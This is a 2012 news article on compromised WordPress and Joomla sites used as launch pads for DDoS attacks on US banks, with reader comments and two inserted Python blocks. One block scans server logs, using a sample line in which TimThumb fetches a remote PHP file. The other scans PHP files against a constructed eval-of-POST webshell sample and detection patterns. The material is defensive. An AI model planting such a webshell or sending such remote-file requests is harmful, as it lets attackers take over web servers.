12/14/2012
Bank Attackers Used PHP Websites As Launch Pads

WordPress sites running an outdated TimThumb plug-in were among the PHP-based sites that hackers used to launch this fall's massive DDoS attacks, Arbor Networks reports.

The group that began targeting U.S. bank websites in September launched their large-scale, distributed denial-of-service (DDoS) attacks via a number of PHP-based websites that they'd previously exploited.

That finding comes from Arbor Networks, which said that attackers had compromised numerous PHP Web applications, such as Joomla, as well as many WordPress sites, many of which were using an outdated version of the TimThumb plug-in. After compromising the sites, attackers then loaded toolkits onto the sites that turned them into DDoS attack launch pads.

"Unmaintained sites running out-of-date extensions are easy targets and the attackers took full advantage of this to upload various PHP webshells which were then used to further deploy attack tools," according to a blog post by Dan Holden and Curt Wilson, who are part of the security engineering and response team at Arbor Networks.


After compromising the PHP-based websites and loading their attack toolkits, the bank attackers then either connected directly to the sites to issue commands, or else used intermediate servers, proxies or scripts. The particular attack tool that was most used by attackers, according to Arbor, was the "itsoknoproblembro" toolkit, which is also known as Brobot. Two other tools, KamiKaze and AMOS, were also used, but less frequently.

Those tools enabled attackers to launch "a mix of application layer attacks on HTTP, HTTPS and DNS with volumetric attack traffic on a variety of TCP, UDP, ICMP and other IP protocols," said Holden and Wilson. "The other obvious and uncommon factor at play was the launch of simultaneous attacks, at high bandwidth, to multiple companies in the same vertical."

The scale of those DDoS attacks disrupted the websites of leading Wall Street firms, including Bank of America, BB&T, JPMorgan Chase, Capital One, HSBC, New York Stock Exchange, Regions Financial, SunTrust, U.S. Bank and Wells Fargo. That was despite the attackers previewing which sites would be attacked, as well as the date and time their attacks would commence.

In late October, after more than a month of bank website attacks, the hacktivist group that claimed credit for the so-called Operation Ababil campaign promised a pause in its efforts. But the group broke its silence earlier this week, when it reemerged and promised to begin attacks this week against Bank of America, JPMorgan Chase, PNC Financial Services Group, SunTrust Banks and U.S. Bancorp.

Those attacks appeared to recommence Tuesday. A spokesman for PNC confirmed Thursday via email that the bank's website had been seeing "an unusual volume of electronic traffic at our Internet connection." But he declined to comment on whether that traffic had been caused by DDoS attacks.

According to Arbor, the new attacks "looked similar in construction to Brobot v1, however there is a newly crafted DNS packet attack and a few other attack changes in Brobot v2," showing that attackers' techniques are continuing to evolve.

What lessons can businesses draw from the Arbor finding that the DDoS bank attackers are using vulnerable WordPress and PHP sites as staging grounds? For starters, businesses should keep an eye on their websites for signs of outdated or unsecured PHP applications -- and not just to help prevent DDoS attacks. Indeed, criminals often use exploited websites to launch attacks and store stolen information.

"WordPress enables these organizations to set up an infrastructure on the Internet that exacerbates the challenge of locating them," said Jim Butterworth, CSO of HBGary, speaking by phone. "They're using it as an opportunistic technique for lifting stolen information, more so than using WordPress as an attack vector."

The gang behind the Eurograbber attack campaign, for example, reportedly used Zitmo Trojan spyware to steal $47 million or more from over 30,000 corporate and private banking customers. Although the gang used command-and-control servers to manage PCs infected with its malware, it had also exploited PHP websites to create drop zones for storing stolen information, as well as for pushing additional attack code to infected PCs. Using drop zones -- as a kind of criminal Dropbox -- helps attackers better cover their tracks and evade security defenses.

Despite those criminal tactics, Butterworth said businesses shouldn't avoid using PHP-based applications such as WordPress. Instead, they should inventory which PHP applications are being used, log network traffic to reveal inbound PHP requests that expose would-be attackers probing for such applications, and ensure that the PHP applications remain hardened against the toolkits and vulnerabilities used to exploit them. "Locate, patch and watch. That's the advice," he said.
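The "watch" part of that advice can be made concrete by running web server access logs through a small classifier. The following is an added example, not code from the article or from Arbor or HBGary: it parses combined-format log lines (the sample lines and the label names are constructed for illustration) and reports source addresses that repeatedly request paths associated with the PHP applications the article names, such as TimThumb with a remote src parameter, Joomla administrator paths, or PHP files inside upload directories.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines in combined format; not taken from the article.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Dec/2012:10:01:02 +0000] "GET /wp-content/themes/foo/timthumb.php?src=http://203.0.113.99/img.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [14/Dec/2012:10:01:03 +0000] "GET /administrator/index.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.10 - - [14/Dec/2012:10:01:04 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Dec/2012:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.10 - - [14/Dec/2012:10:01:05 +0000] "POST /images/stories/upd.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, identity, user, [timestamp], "METHOD PATH PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Request-path patterns that suggest probing for the PHP applications named in the article.
# Labels are my own; tune the list to the applications actually present in your inventory.
PROBE_PATTERNS = [
    ("timthumb-remote-src", re.compile(r'timthumb\.php\?.*\bsrc=https?://', re.I)),
    ("joomla-admin-probe", re.compile(r'^/administrator/', re.I)),
    ("wordpress-login-probe", re.compile(r'^/wp-login\.php', re.I)),
    ("php-in-upload-dir", re.compile(r'^/(?:images|uploads|wp-content/uploads)/.*\.php\b', re.I)),
]

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(entry):
    """Return the probe labels whose pattern matches this request's path (query included)."""
    return [name for name, rx in PROBE_PATTERNS if rx.search(entry["path"])]

def find_probers(log_text, min_hits=2):
    """Map each source IP with at least min_hits suspicious requests to its sorted labels."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits[entry["ip"]].extend(classify(entry))
    return {ip: sorted(set(tags)) for ip, tags in hits.items() if len(tags) >= min_hits}

if __name__ == "__main__":
    for ip, tags in find_probers(SAMPLE_LOG).items():
        print(ip, ", ".join(tags))
```

A single hit on a legitimate WordPress login is normal, which is why the threshold counts distinct suspicious requests per source rather than alerting on any one match.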


Comments
MarkSitkowski,
User Rank: Moderator
4/5/2013 | 4:58:18 AM
re: Bank Attackers Used PHP Websites As Launch Pads
Instead of waiting for your kernel to get overwhelmed with DNS replies for which it never asked, do this in your firewall:

block in on e1000g0 proto udp all
pass in on e1000g0 proto udp from our.dns.server1/32
pass in on e1000g0 proto udp from our.dns.server2/32
pass in on e1000g0 proto udp from any.xdmcp.box/32

The Unix kernel never sees any of that garbage, and the machine doesn't fall over.
SpamIsLame,
User Rank: Apprentice
4/29/2013 | 9:35:17 PM
re: Bank Attackers Used PHP Websites As Launch Pads
I was recently brought in to investigate why a specific Unix web server was suddenly running this DDOS code. None of this appears to be documented anywhere. The results of my investigations so far are disappointing and troubling. There are a lot of really vulnerable servers out there being used for free by the criminal community at large.

The criminals behind this operation are placing code on very vulnerable, unsecured Unix servers running PHP. If that PHP server allows an "eval" command to be run that allows a script to perform high-level, near-root-level functions like shutting down logging and restarting the web server, they place a file on it that allows it to run ANY command it receives, using the "eval" function.

This is why there are a bunch of reports out there that talk about how the botnet is "learning" or "gaining new powers". It's a really wide-open, non-secure server that will run *any* command. It's not "learning". It's at the mercy of any idiot who knows how to send it a large sequence of commands to run.

SiL
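The behaviour described in that comment, a dropped PHP file that disables logging and hands whatever it receives to eval, is something an administrator can sweep a web root for. The following is an added example, not code from the article or from the commenter: it scans .php files for request input passed straight to eval and for calls that switch error logging off, and reports the files where either fires. The two PHP samples and the indicator names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Constructed PHP samples, not from the page: a benign template and one showing the
# comment's pattern (logging switched off, then request input handed straight to eval).
BENIGN_PHP = "<?php\n$title = htmlspecialchars($_GET['title'] ?? '');\necho \"<h1>$title</h1>\";\n"
SUSPECT_PHP = "<?php\n@ini_set('log_errors', 0);\nif (isset($_POST['c'])) { eval($_POST['c']); }\n"

# Indicator names are my own; the regexes target the behaviour the comment describes.
INDICATORS = {
    "eval-of-request-input": re.compile(
        r'\beval\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I),
    "logging-disabled": re.compile(
        r'ini_set\s*\(\s*[\'"](?:log_errors|display_errors)[\'"]\s*,\s*(?:0|[\'"]?off[\'"]?|false)\s*\)', re.I),
    "error-reporting-off": re.compile(r'\berror_reporting\s*\(\s*0\s*\)', re.I),
}

def scan_php_source(src):
    """Return the indicator names that fire on the contents of one PHP file."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def scan_tree(root):
    """Walk a web root and return {relative path: indicators} for every .php file with a hit."""
    root = Path(root)
    findings = {}
    for p in root.rglob("*.php"):
        try:
            hits = scan_php_source(p.read_text(errors="ignore"))
        except OSError:
            continue
        if hits:
            findings[p.relative_to(root).as_posix()] = hits
    return findings

def scan_samples():
    """Write the constructed samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "header.php").write_text(BENIGN_PHP)
        (root / "images").mkdir()
        (root / "images" / "upd.php").write_text(SUSPECT_PHP)
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in scan_samples().items():
        print(path, ", ".join(hits))
```

Real drops are often encoded or split across files, so treat this as a first pass to be paired with file-integrity checks and the inventory-and-patch steps the article recommends.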